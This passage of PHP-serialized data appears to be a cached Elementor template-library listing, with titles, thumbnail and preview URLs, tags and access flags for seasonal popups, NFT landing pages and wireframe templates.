4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-5-Small.jpg\";s:12:\"tmpl_created\";i:1647858024;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-discount-halloween-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:44:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:95;a:16:{s:4:\"tmpl\";i:1379;s:2:\"id\";i:23422;s:5:\"title\";s:36:\"Classic | Subscription | Halloween 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Halloween-4-Small.jpg\";s:12:\"tmpl_created\";i:1647858246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-halloween-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:48:\"[\"Discount\",\"Ecommerce\",\"Halloween\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:96;a:16:{s:4:\"tmpl\";i:1380;s:2:\"id\";i:23471;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 1\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-2-Small.jpg\";s:12:\"tmpl_created\";i:1647859193;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:97;a:16:{s:4:\"tmpl\";i:1381;s:2:\"id\";i:23477;s:5:\"title\";s:28:\"Slide-In | CTA | Christmas 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-4-Small.jpg\";s:12:\"tmpl_created\";i:1647859838;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/slide-in-cta-christmas-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Christmas\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:98;a:16:{s:4:\"tmpl\";i:1382;s:2:\"id\";i:23483;s:5:\"title\";s:26:\"Fly-In | CTA | Christmas 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-1-Small.jpg\";s:12:\"tmpl_created\";i:1647860157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/fly-in-cta-christmas-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:99;a:16:{s:4:\"tmpl\";i:1383;s:2:\"id\";i:23489;s:5:\"title\";s:33:\"Slide-In | Discount | Christmas 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-5-Small.jpg\";s:12:\"tmpl_created\";i:1647860302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-discount-christmas-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:31:\"[\"Christmas\",\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:100;a:16:{s:4:\"tmpl\";i:1384;s:2:\"id\";i:23496;s:5:\"title\";s:32:\"Classic | Discount | Christmas 5\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/Christmas-3-Small.jpg\";s:12:\"tmpl_created\";i:1647860454;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-christmas-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Christmas\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:101;a:16:{s:4:\"tmpl\";i:1385;s:2:\"id\";i:23523;s:5:\"title\";s:30:\"Classic | CTA | Valentines Day\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-2-Small.jpg\";s:12:\"tmpl_created\";i:1647860912;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-valentines-day/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:102;a:16:{s:4:\"tmpl\";i:1386;s:2:\"id\";i:23529;s:5:\"title\";s:39:\"Hello Bar | Discount | Valentines Day 2\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-1-Small.jpg\";s:12:\"tmpl_created\";i:1647861064;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-discount-valentines-day-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:30:\"[\"Discount\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:103;a:16:{s:4:\"tmpl\";i:1387;s:2:\"id\";i:23536;s:5:\"title\";s:32:\"Classic | CTA | Valentines Day 3\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/Valentines-Day-3-Small.jpg\";s:12:\"tmpl_created\";i:1647861536;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-cta-valentines-day-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"cta\",\"Valentine\'s Day\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:104;a:16:{s:4:\"tmpl\";i:1388;s:2:\"id\";i:23586;s:5:\"title\";s:51:\"Fly-In | Subscribe | Health &#038; Wellness Company\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/35-Subscribe-Health-Wellness-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647862008;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscribe-health-wellness-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"Business\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:105;a:16:{s:4:\"tmpl\";i:1389;s:2:\"id\";i:23592;s:5:\"title\";s:34:\"Classic | Subscribe | Tech Company\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/36-Subscribe-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647866706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-subscribe-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:25:\"[\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:106;a:16:{s:4:\"tmpl\";i:1390;s:2:\"id\";i:23598;s:5:\"title\";s:36:\"Classic | Contact Us | Fight Classes\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/37-Contact-Us-Fight-Classes-Small.jpg\";s:12:\"tmpl_created\";i:1647866869;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-contact-us-fight-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:107;a:16:{s:4:\"tmpl\";i:1391;s:2:\"id\";i:23611;s:5:\"title\";s:31:\"Classic | CTA | Mochi Shop Sale\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2022/03/39-Click-Through-Mochi-Shop-Sale-Small.jpg\";s:12:\"tmpl_created\";i:1647867750;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-cta-mochi-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"cta\",\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:108;a:16:{s:4:\"tmpl\";i:1392;s:2:\"id\";i:23618;s:5:\"title\";s:28:\"Classic | CTA | Fashion Shop\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2022/03/40-Click-Through-Fashion-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647868251;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-cta-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"cta\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:109;a:16:{s:4:\"tmpl\";i:1393;s:2:\"id\";i:23624;s:5:\"title\";s:29:\"Fly-In | Login | Tech Company\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/41-Login-Tech-Company-Small.jpg\";s:12:\"tmpl_created\";i:1647868704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/fly-in-login-tech-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:9:\"[\"Login\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:110;a:16:{s:4:\"tmpl\";i:1394;s:2:\"id\";i:23630;s:5:\"title\";s:36:\"Fly-In | Verification | Liquor Store\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/42-Verification-Liquor-Store-Small.jpg\";s:12:\"tmpl_created\";i:1647870308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-verification-liquor-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:111;a:16:{s:4:\"tmpl\";i:1395;s:2:\"id\";i:23636;s:5:\"title\";s:39:\"Hello Bar | Subscribe | Online Magazine\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/44-Subscribe-Online-Magazine-Small.jpg\";s:12:\"tmpl_created\";i:1647870465;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-subscribe-online-magazine/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:20:\"[\"Blog\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:112;a:16:{s:4:\"tmpl\";i:1396;s:2:\"id\";i:23642;s:5:\"title\";s:27:\"Fly-In | Login | Health Spa\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/43-Login-Health-Spa-Small.jpg\";s:12:\"tmpl_created\";i:1647872427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/fly-in-login-health-spa/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Login\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:113;a:16:{s:4:\"tmpl\";i:1397;s:2:\"id\";i:23648;s:5:\"title\";s:33:\"Fly-In | Verification | Wine Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/45-Verification-Wine-Shop-Small.jpg\";s:12:\"tmpl_created\";i:1647872627;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/fly-in-verification-wine-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:16:\"[\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:114;a:16:{s:4:\"tmpl\";i:899;s:2:\"id\";i:11839;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Header_small.png\";s:12:\"tmpl_created\";i:1569430015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:20;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:115;a:16:{s:4:\"tmpl\";i:1421;s:2:\"id\";i:24235;s:5:\"title\";s:24:\"Ladydog Club &#8211; NFT\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/05/Ladydog_Club.jpg\";s:12:\"tmpl_created\";i:1651525072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/lp/ladydog-club-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:116;a:16:{s:4:\"tmpl\";i:1422;s:2:\"id\";i:24166;s:5:\"title\";s:15:\"Dot &#8211; NFT\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2022/05/Dot-250_280.jpg\";s:12:\"tmpl_created\";i:1651525117;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/lp/dot-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:117;a:16:{s:4:\"tmpl\";i:1423;s:2:\"id\";i:24191;s:5:\"title\";s:28:\"Cosmic Neighbors &#8211; NFT\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Cosmic_Neighbors-250_280.jpg\";s:12:\"tmpl_created\";i:1651525124;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/cosmic-neighbors-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:118;a:16:{s:4:\"tmpl\";i:1424;s:2:\"id\";i:24255;s:5:\"title\";s:30:\"Happy Food Friends &#8211; NFT\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/05/Featured_Image.jpg\";s:12:\"tmpl_created\";i:1651525475;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/happy-food-friends-nft/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:3:\"NFT\";s:4:\"tags\";s:100:\"[\"Art\",\"Author\",\"Business\",\"Creative\",\"Design\",\"Gallery\",\"Landing Pages\",\"NFT\",\"Products\",\"Virtual\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:119;a:16:{s:4:\"tmpl\";i:1443;s:2:\"id\";i:24599;s:5:\"title\";s:27:\"Wireframe &#8211; Courses 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Courses-1.jpg\";s:12:\"tmpl_created\";i:1653989626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-courses-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:180:\"[\"About\",\"Academy\",\"Booking\",\"Business\",\"Course Online\",\"Features\",\"Footer\",\"Landing Pages\",\"Online Service\",\"Professional\",\"School\",\"Services\",\"Subscribe\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:120;a:16:{s:4:\"tmpl\";i:1444;s:2:\"id\";i:24614;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1-2.jpg\";s:12:\"tmpl_created\";i:1653990084;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:139:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Header\",\"Landing Pages\",\"Online Service\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:121;a:16:{s:4:\"tmpl\";i:1445;s:2:\"id\";i:24629;s:5:\"title\";s:28:\"Wireframe &#8211; Services 2\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2-2.jpg\";s:12:\"tmpl_created\";i:1653990132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:123:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:122;a:16:{s:4:\"tmpl\";i:1446;s:2:\"id\";i:24644;s:5:\"title\";s:27:\"Wireframe &#8211; Webinar 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Webinar-1.jpg\";s:12:\"tmpl_created\";i:1653990164;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/wireframe-webinar-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:177:\"[\"About\",\"Academy\",\"Booking\",\"Conference\",\"Course Online\",\"Education\",\"Features\",\"Footer\",\"Form\",\"Landing Pages\",\"Online Event\",\"Online Service\",\"Subscribe\",\"Virtual\",\"Webinar\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:123;a:16:{s:4:\"tmpl\";i:1447;s:2:\"id\";i:24655;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3-2.jpg\";s:12:\"tmpl_created\";i:1653990198;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:143:\"[\"About\",\"Agency\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Landing Pages\",\"Portfolio\",\"Professional\",\"Project\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:124;a:16:{s:4:\"tmpl\";i:1448;s:2:\"id\";i:24677;s:5:\"title\";s:28:\"Wireframe &#8211; Services 4\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-4.jpg\";s:12:\"tmpl_created\";i:1653990233;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-services-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:102:\"[\"About\",\"Business\",\"Contact\",\"Footer\",\"Form\",\"Landing Pages\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:125;a:16:{s:4:\"tmpl\";i:1449;s:2:\"id\";i:24687;s:5:\"title\";s:28:\"Wireframe &#8211; Products 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Products-1.jpg\";s:12:\"tmpl_created\";i:1653990273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/wireframe-products-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Wireframe\";s:4:\"tags\";s:128:\"[\"About\",\"Booking\",\"Business\",\"Clients\",\"Ecommerce\",\"Features\",\"Footer\",\"Landing Pages\",\"Products\",\"Sales\",\"Shop\",\"Testimonial\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:126;a:16:{s:4:\"tmpl\";i:1450;s:2:\"id\";i:24706;s:5:\"title\";s:28:\"Wireframe &#8211; Services 